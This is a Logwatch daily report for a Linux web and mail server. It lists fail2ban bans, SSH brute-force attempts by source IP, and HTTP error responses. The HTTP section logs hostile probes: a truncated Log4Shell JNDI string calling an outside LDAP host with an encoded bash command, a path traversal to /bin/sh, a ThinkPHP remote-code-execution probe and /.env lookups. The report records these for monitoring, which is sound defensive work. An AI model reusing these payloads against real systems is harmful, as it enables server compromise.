[TOPF] Logwatch for h2361197.stratoserver.net (Linux)

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Tue Dec 21 04:42:05 2021 Date Range Processed: yesterday ( 2021-Dec-20 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 16:16 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 222.186.19.235 -> zapf.wiki:443: 1 Time(s) A total of 9 sites probed the server 112.238.44.65 143.198.155.215 159.223.72.33 161.35.151.45 165.22.25.152 165.232.185.23 170.106.176.49 185.44.81.176 222.186.19.235 Requests with error response codes 400 Bad Request null: 9 Time(s) mstshash=Administr: 5 Time(s) /: 2 Time(s) mstshash=Domain: 2 Time(s) /.env: 1 Time(s) /ab2g: 1 Time(s) /ab2h: 1 Time(s) /api/v1: 1 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s) /manager/html: 1 Time(s) F\x83\xA5D\xBBgtN\xEC\xE8\xAF\xA5\x8D`&UU\ ... x09\xC0\x14\xC0: 1 Time(s) HTTP/1.0: 1 Time(s) T\xDF\x96USST\x11.O\x03\xD6D\x05/\xF07\xA6 ... x09\xC0\x14\xC0: 1 Time(s) \x88:\xAB(\xBC\x9A\xBBz\x88e\xC9E\xD7\x02S: 1 Time(s) g\xC1\x81i\xB3\xF6\xF2\xCB\xB0\xA9\x19N\xD ... x09\xC0\x13\xC0: 1 Time(s) zapf.wiki:443: 1 Time(s) 403 Forbidden /FrcS3CFURGOhH8IZnOVeEw: 1 Time(s) 404 Not Found /konstanz/2016/tagung/impressum.html: 1 Time(s) /konstanz/2016/tagung/index.html: 1 Time(s) /konstanz/2016/tagung/unterstuetzer/Sponsoren.html: 1 Time(s) /konstanz/2016/unterstuetzer/impressum.html: 1 Time(s) /konstanz/2016/unterstuetzer/index.html: 1 Time(s) /konstanz/2016/unterstuetzer/tagung/programm.html: 1 Time(s) /konstanz/2016/unterstuetzer/willkommen/wasistdiezapf.html: 1 Time(s) /konstanz/2016/unterstuetzer/willkommen/wersindwir.html: 1 Time(s) /konstanz/2016/unterstuetzer/willkommen/willkommen.html: 1 Time(s) /konstanz/2016/willkommen/impressum.html: 1 Time(s) /konstanz/2016/willkommen/index.html: 1 Time(s) /konstanz/2016/willkommen/tagung/programm.html: 1 Time(s) /konstanz/2016/willkommen/unterstuetzer/Sponsoren.html: 1 Time(s) 499 (undefined) /: 4 Time(s) 500 Internal Server Error /: 23 Time(s) /.env: 7 Time(s) /robots.txt: 3 Time(s) /ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s) /?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s) /Autodiscover/Autodiscover.xml: 1 Time(s) /actuator/health: 1 Time(s) /api/v1: 1 Time(s) /bag2: 1 Time(s) /console/: 1 Time(s) /hmc/hybris: 1 Time(s) /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s) /owa/auth/logon.aspx: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /owa/auth/x.js: 1 Time(s) /solr/: 1 Time(s) /tips/tipsSimulationUpload.action: 1 Time(s) 502 Bad Gateway /D1lk7Eb3Squ7uGiIXiErNg/pdf: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NtPLnYm: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (202.101.186.218): 35 Time(s) root (119.29.77.63): 30 Time(s) root (188.166.221.11): 29 Time(s) root (165.227.16.82): 28 Time(s) unknown (188.166.221.11): 20 Time(s) unknown (119.29.77.63): 18 Time(s) unknown (165.227.16.82): 18 Time(s) root (194.170.156.9): 17 Time(s) root (106.13.74.61): 16 Time(s) root (81.70.163.61): 15 Time(s) unknown (202.101.186.218): 14 Time(s) root (45.137.197.35.bc.googleusercontent.com): 13 Time(s) unknown (106.13.74.61): 9 Time(s) unknown (194.170.156.9): 9 Time(s) root (186.178.57.81): 6 Time(s) root (189.254.255.3): 4 Time(s) root (103.133.57.250): 2 Time(s) root (89-97-218-142.ip19.fastwebnet.it): 2 Time(s) unknown (110.136.232.7): 2 Time(s) unknown (158.red-79-153-190.dynamicip.rima-tde.net): 2 Time(s) unknown (79.140.124.247): 2 Time(s) unknown (82-65-33-144.subs.proxad.net): 2 Time(s) unknown (89-97-218-142.ip19.fastwebnet.it): 2 Time(s) unknown (host-24-224-178-87.public.eastlink.ca): 2 Time(s) mysql (188.166.221.11): 1 Time(s) root (159.192.209.87): 1 Time(s) root (164.90.203.55): 1 Time(s) root (219.145.61.20): 1 Time(s) unknown (134.236.247.145): 1 Time(s) unknown (146.185.79.101): 1 Time(s) unknown (189.254.255.3): 1 Time(s) unknown (195.133.18.104): 1 Time(s) unknown (31.184.198.71): 1 Time(s) unknown (45.137.197.35.bc.googleusercontent.com): 1 Time(s) unknown (81.70.163.61): 1 Time(s) unknown (server.kompraqui.com): 1 Time(s) Invalid Users: Unknown Account: 108 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 8.793K Bytes accepted 9,004 8.793K Bytes sent via SMTP 9,004 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 2 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 2 Total 4xx Rejects 100.00% ======== ================================================== 1405 Connections 1356 Connections lost (inbound) 1405 Disconnections 1 Removed from queue 1 Sent via SMTP ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 1 Time(s) Failed logins from: 35.197.137.45 (45.137.197.35.bc.googleusercontent.com): 13 times 81.70.163.61: 15 times 89.97.218.142 (89-97-218-142.ip19.fastwebnet.it): 2 times 103.133.57.250: 2 times 106.13.74.61: 16 times 119.29.77.63: 30 times 159.192.209.87: 1 time 164.90.203.55: 1 time 165.227.16.82: 28 times 186.178.57.81 (81.57.178.186.static.anycast.cnt-grms.ec): 6 times 188.166.221.11: 30 times 189.254.255.3 (customer-189-254-255-3-sta.uninet-ide.com.mx): 4 times 194.170.156.9: 17 times 202.101.186.218: 35 times 219.145.61.20: 1 time Illegal users from: 2001:470:1:c84::31: 1 time undef: 72 times 24.224.178.87 (host-24-224-178-87.public.eastlink.ca): 2 times 31.184.198.71: 1 time 35.197.137.45 (45.137.197.35.bc.googleusercontent.com): 1 time 79.140.124.247: 2 times 79.153.190.158 (158.red-79-153-190.dynamicip.rima-tde.net): 2 times 81.70.163.61: 1 time 82.65.33.144 (82-65-33-144.subs.proxad.net): 2 times 89.97.218.142 (89-97-218-142.ip19.fastwebnet.it): 2 times 106.13.74.61: 9 times 110.136.232.7: 2 times 119.29.77.63: 18 times 134.236.247.145: 1 time 146.185.79.101: 1 time 162.214.53.159 (server.kompraqui.com): 1 time 165.227.16.82: 18 times 188.166.221.11: 20 times 189.254.255.3 (customer-189-254-255-3-sta.uninet-ide.com.mx): 1 time 194.170.156.9: 9 times 195.133.18.104: 1 time 202.101.186.218: 14 times **Unmatched Entries** Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (0,ssh-connection) [preauth] : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop33257p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################